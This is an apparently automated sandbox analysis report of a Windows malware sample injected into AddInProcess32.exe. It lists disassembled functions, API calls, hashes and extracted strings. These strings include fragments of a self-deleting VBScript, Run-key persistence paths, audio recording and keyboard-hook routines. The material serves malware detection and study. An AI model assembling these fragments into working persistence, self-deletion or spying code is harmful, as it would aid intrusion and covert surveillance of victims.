                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$tMG$wend$while fso.FileExists("
                                                                                                • API String ID: 1861856835-2336284224
                                                                                                • Opcode ID: 0a4e3dce11f7039bd0562e6eb1cbd753e4ebbc285b9ba19925173f3dfa5e1f89
                                                                                                • Instruction ID: 74aa42f7ec26bf67edaf4e1a165d404297a62af2c65c2789fcbb2c22ca84ca6d
                                                                                                • Opcode Fuzzy Hash: 0a4e3dce11f7039bd0562e6eb1cbd753e4ebbc285b9ba19925173f3dfa5e1f89
                                                                                                • Instruction Fuzzy Hash: B991B1316082005AC315FB62D8529AFB3A8AF94309F50443FB64AA71E3EF7C9D49C65E
                                                                                                Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: ")$.vbs$HSG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$tMG$wend$while fso.FileExists("$xpF
                                                                                                • API String ID: 3797177996-3101290586
                                                                                                • Opcode ID: b2357534cd66bd33ac45c79499083539b0c5b06e9870c8bdbe25e8224896e8fc
                                                                                                • Instruction ID: d04a29aa4e51556796b06844e147f4a7cb6a24a543372ca0e3e4f3e54a9e1c14
                                                                                                • Opcode Fuzzy Hash: b2357534cd66bd33ac45c79499083539b0c5b06e9870c8bdbe25e8224896e8fc
                                                                                                • Instruction Fuzzy Hash: 7781A1716082405BC715FB62D8529AF73A8AF94308F10443FB58A671E3EF7C9E49C69E
                                                                                                Function 004124B0 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 190synchronizationsleepfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750F4,00000003), ref: 004124CF
                                                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                • String ID: (TG$.exe$HSG$WDH$exepath$open$temp_
                                                                                                • API String ID: 2649220323-4116078715
                                                                                                • Opcode ID: 4af9612e6dfe4c22a935919a48fba31c7c6363db64e19c4ac38d9d1038a54d43
                                                                                                • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                                                                                • Opcode Fuzzy Hash: 4af9612e6dfe4c22a935919a48fba31c7c6363db64e19c4ac38d9d1038a54d43
                                                                                                • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
                                                                                                Function 0041B0D8 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EF0,00000000), ref: 0041B21F
                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                • API String ID: 738084811-1354618412
                                                                                                • Opcode ID: 1ebe52de8fce74bd771dbbd14165b571df77c24b16b3e8ae8527e3160db55f87
                                                                                                • Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
                                                                                                • Opcode Fuzzy Hash: 1ebe52de8fce74bd771dbbd14165b571df77c24b16b3e8ae8527e3160db55f87
                                                                                                • Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
                                                                                                Function 00401CE9 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
                                                                                                • WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
                                                                                                • WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
                                                                                                • WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Write$Create
                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                • API String ID: 1602526932-4212202414
                                                                                                • Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                • Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
                                                                                                • Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                • Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
                                                                                                Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004076B0,004752E8,00407709), ref: 004072BF
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                • API String ID: 1646373207-4283035339
                                                                                                • Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                                                                • Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
                                                                                                • Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                                                                • Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
                                                                                                Function 0040CE34 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040CE42
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750F4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                                                • _wcslen.LIBCMT ref: 0040CF21
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CFBF
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                • _wcslen.LIBCMT ref: 0040D001
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750F4,0000000E), ref: 0040D068
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open$RG$RG
                                                                                                • API String ID: 1579085052-2529979590
                                                                                                • Opcode ID: 64acb6d32da23e36a4ac8d6ed565a0560cad41de601bfdc8fc88007b96f058bf
                                                                                                • Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
                                                                                                • Opcode Fuzzy Hash: 64acb6d32da23e36a4ac8d6ed565a0560cad41de601bfdc8fc88007b96f058bf
                                                                                                • Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E
                                                                                                Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                • GetLastError.KERNEL32 ref: 0041C204
                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                • GetLastError.KERNEL32 ref: 0041C261
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                • String ID: ?
                                                                                                • API String ID: 3941738427-1684325040
                                                                                                • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                • String ID:
                                                                                                • API String ID: 3899193279-0
                                                                                                • Opcode ID: 546d6b1eb3b41f64b2e76db450b04a782591562765fde2d4f0a87aa2ff6224bf
                                                                                                • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                • Opcode Fuzzy Hash: 546d6b1eb3b41f64b2e76db450b04a782591562765fde2d4f0a87aa2ff6224bf
                                                                                                • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                • API String ID: 2490988753-744132762
                                                                                                • Opcode ID: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                • Instruction ID: 3afff981d8ce70f6205f85204df1f21ec1f12b20cff6a054e3a0857f0929e507
                                                                                                • Opcode Fuzzy Hash: 93ac1047b93552b97dd98974212ca4d4f14522e3aac142c7c555de1a9c5e5d12
                                                                                                • Instruction Fuzzy Hash: 3231C2B2906315ABD7209F65CC84EDF76DCAB84754F004A2AF984A3211D738D985CBAE
                                                                                                Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
                                                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                • Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
                                                                                                • Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                • Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
                                                                                                Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                • Opcode Fuzzy Hash: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                Function 00412AEF Relevance: 21.5, APIs: 9, Strings: 3, Instructions: 482sleepfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                • String ID: /stext "$@TG$@TG
                                                                                                • API String ID: 1223786279-723413999
                                                                                                • Opcode ID: 38617018d286a3b87a0abf8149734a2fccd9fe0e4487ad0e26cec028f794f095
                                                                                                • Instruction ID: 54c64e465a66050ec466d83b34d0c9889d7f3cdaa7358c1e9e14d2467042f0e2
                                                                                                • Opcode Fuzzy Hash: 38617018d286a3b87a0abf8149734a2fccd9fe0e4487ad0e26cec028f794f095
                                                                                                • Instruction Fuzzy Hash: 5B0268315083414AC325FB62D891AEFB3E5AFD0348F50483FF58A971E2EF785A49C65A
